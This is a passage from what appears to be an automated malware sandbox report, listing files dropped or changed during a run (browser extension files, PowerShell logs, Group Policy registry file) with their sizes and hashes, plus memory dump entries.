8211e91e27dda6d6001cfe5b76944f05

SHA1
822a15b0299301f11d5c78d5935536c89836168b

SHA256
69434d7845d85b19685b2490db820c985ebac7d9d8e05f4211a723f185568a87

SHA512
2d77599455c20f19a5327e0f7ff0d0e1bd2d737198d08788334291dc75b6d6c36916d55ca69d5965522252cf7a3f0aced0d5fa28866e9c6c420c8a8832582d4e

Download Submit
C:\Program Files (x86)\fJZgEdoSEgzXC\AaKfJcZ.xml

Filesize
2KB

MD5
b904e23fd76c1eb12b8b19e49f0be301

SHA1
bb503dab40c5fe7ec41180350f58f18843e69f7a

SHA256
e30629f7e6742dad8131bf79edc1efca8320c219911990208b22a196ba10e0a3

SHA512
e190a855acf9a6a7986b21f18420d10710980e87748f91b5ed8d8a383933a34914294886d001853ac681ee2ebca2c003e25140bead005b86a5e78a2159ea2f89

Download Submit
C:\Program Files (x86)\jAmSRiPKU\MIdCqfX.xml

Filesize
2KB

MD5
10734d1fda713e4108c9c909b0f531a3

SHA1
e2d8f30e78c691ff447e901e714f2e4e58566811

SHA256
dcf54138bd85e98664722de3d80aa86164d2a5593944a63bc0bda944451868f3

SHA512
cf764a17107c158c206620690bb1eb527cfc4581c36f7f46242dac0e53b01db4b2b2ad7d642c359ce915377a0c3884ff131b50500a2f7628f6c3b633839c071a

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi

Filesize
2.1MB

MD5
0a6a638088a18f6644b6848f60202894

SHA1
7f12dea32c03d7148d693b61d4231628e0400229

SHA256
dcd0887b77fe3fba7cdcefce53f7523b4f63dcd1f58d5b4b04b0b233cab4b89c

SHA512
bd9991d3b2f2cc9fe594fe401c74af80f57abc910c788e223095be7e5bb485790d80d547e5f6150a678e5d9eef1b5f76b3b361b475994a619424483cfa36bb11

Download Submit
C:\ProgramData\YpcryChfqZNPHIVB\FYJdVKO.xml

Filesize
2KB

MD5
1ecc34c14c98db7a8080098e0bcaae3d

SHA1
82577ee43f942947e969a5670190752fa07185cc

SHA256
796e23f2ab0c3ce149eb75b10e70edc5cb596f28685b2499c4710036b2b73b46

SHA512
f7abb2418b73dce811f8eb76ceff01b23ab6590785a46d2448b05814d600534157d03a2b07e0b82fc30c89a4150589a0d4a98d3a1891faaf69ee580d4b9795fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
e04335f1ab94c70684e648d74a01b5e8

SHA1
3404d018fed2b8a27bc3f20f06ec699e5f0ffeb5

SHA256
bd2cde8451e9317b8c0521661bc5077a4e74fb41d94d509584dfe7f82d63d578

SHA512
5f495aab1f3a1941b22082a8669ae82fa41481cec5410f96c609aac743c6c8b8343c3c8fed4cc5e45de2c287f1ac4858cf2df6ef8e62961996c0775fb38d4556

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jplejccakjkaecknpnhhnloclhijfhme\2020_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
fefe625733bade6d84d3a26a6ba18d1c

SHA1
449b64a4c12d4daa5b94b2ad088f5c8af9f6894a

SHA256
e42965518097ba651b596904e1ea459a8dd7795081cf2c564f64e8a669d8e1c8

SHA512
7dd1672a541e9f526288b25c27a528bc98efca3dd94d571fe1207359f60bec044b5c5082799c603fff41ae41393935fbe89ad32d739f5aae03f4e902de77919b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
b2a35febcb9b40f401a9c2391dbe02e9

SHA1
a7b256525a4b5a3578ad58b6f89294000e8eb1f9

SHA256
c0038a24169108a1c9d9a3cb40bfbfb213c3fc337cde4aaa86c36995af9cca47

SHA512
690ad1c8279815d7dca67af0e5b2ba906c1835cb3b7f7c981a2e9dec947a2cfa7a4bf50ea345dd615ab6cfc7adfe5bfb0659b0a3e05ae7f3d800e3a62d833e10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
eec93366d69e8fd201d976eb847a0474

SHA1
63699215288453c2ef86ee38a2cc9eb71bd35f52

SHA256
82930e8521f77890d1858a22b7de7552859d522caa0f6989a210aee4771aa0ab

SHA512
425baa62a304cd3104365de32c98a0932571ffdc4b67d618df8c3a3f8f905e691e467960ecc47dfe6d662dbcf049171fce529003a32c323b7b21ef8adb9b5d85

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yw23eew.ac2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

Filesize
12KB

MD5
7b7c69fb2d013a68964f8b9ca8f1f13f

SHA1
3ac35841223ec6dbf8768e66914deea718d20e16

SHA256
ac131e98d430169f338a7587e866d14eff88b6bd10c7301a969565950e31988a

SHA512
062c4fdfc8088909596fd9a87df856c8e74cba417e80f7dff21d93874e4f27cc06130653cac9a01b37c9fe3be5eeae93b96aac436fe7d30fcc4deac6ac0973b9

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Filesize
7KB

MD5
866355a9e13744b8310694f86a6a6040

SHA1
c2d9e9a78742bf455fd15589b2d83dc7870d7bae

SHA256
cfed6b1cc62179e2e8ab258ea6f36a1728a70980c53cfbcd3988d2c0cc3eccd1

SHA512
b9a80bbafe531e31db054e006a372fdb0c083ec85922bf1b2125e7a8ff40bcc9f89a7d964e28e43d250266acee28da8a3f9d5f3301678a4879155110aff74147

Download Submit
memory/1448-1-0x0000000002F60000-0x0000000002F96000-memory.dmp

Filesize
216KB

Download
memory/1448-2-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/1448-3-0x00000000058F0000-0x0000000005912000-memory.dmp

Filesize
136KB

Download
memory/1448-4-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/1448-20-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/1448-5-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/1448-21-0x00000000080A0000-0x0000000008644000-memory.dmp

Filesize
5.6MB

Download
memory/1448-19-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/1448-15-0x00000000063D0000-0x0000000006724000-memory.dmp

Filesize
3.3MB

Download
memory/1448-18-0x0000000007A50000-0x0000000007AE6000-memory.dmp

Filesize
600KB

Download
memory/1448-17-0x00000000068B0000-0x00000000068FC000-memory.dmp

Filesize
304KB

Download
memory/1448-16-0x0000000006880000-0x000000000689E000-memory.dmp

Filesize
120KB

Download
memory/3624-0-0x0000000000A20000-0x00000000010CE000-memory.dmp

Filesize
6.7MB

Download
memory/3624-122-0x00000000046C0000-0x0000000004726000-memory.dmp

Filesize
408KB

Download
memory/3624-78-0x00000000043E0000-0x0000000004465000-memory.dmp

Filesize
532KB

Download
memory/3624-69-0x0000000000A20000-0x00000000010CE000-memory.dmp

Filesize
6.7MB

Download
memory/3624-24-0x0000000010000000-0x00000000124AF000-memory.dmp

Filesize
36.7MB

Download
memory/3624-449-0x0000000005450000-0x00000000054D4000-memory.dmp

Filesize
528KB

Download
memory/3624-463-0x00000000054E0000-0x00000000055BA000-memory.dmp

Filesize
872KB

Download
memory/3876-51-0x0000000005C90000-0x0000000005FE4000-memory.dmp

Filesize
3.3MB

Download
memory/3920-57-0x000001837CBF0000-0x000001837CC12000-memory.dmp

Filesize
136KB

Download
memory/4204-40-0x00000000063B0000-0x00000000063FC000-memory.dmp

Filesize
304KB

Download
memory/4204-38-0x0000000005A10000-0x0000000005D64000-memory.dmp

Filesize
3.3MB

Download